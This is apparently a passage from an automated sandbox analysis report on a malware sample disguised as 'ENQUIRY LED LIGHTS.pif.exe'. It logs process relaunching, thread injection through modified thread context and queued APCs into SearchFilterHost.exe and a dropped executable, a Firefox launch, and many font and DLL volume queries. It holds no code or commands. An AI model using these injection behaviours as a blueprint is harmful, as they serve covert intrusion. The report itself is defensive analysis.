            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeThread register set: target process: 8148Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeThread APC queued: target process: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"Jump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeProcess created: C:\Windows\SysWOW64\SearchFilterHost.exe "C:\Windows\SysWOW64\SearchFilterHost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: bdtKgWWjtPR.exe, 00000007.00000002.2977085828.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000007.00000000.1985749724.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2976815438.00000000011D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: bdtKgWWjtPR.exe, 00000007.00000002.2977085828.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000007.00000000.1985749724.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2976815438.00000000011D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: bdtKgWWjtPR.exe, 00000007.00000002.2977085828.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000007.00000000.1985749724.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2976815438.00000000011D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: bdtKgWWjtPR.exe, 00000007.00000002.2977085828.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000007.00000000.1985749724.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2976815438.00000000011D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
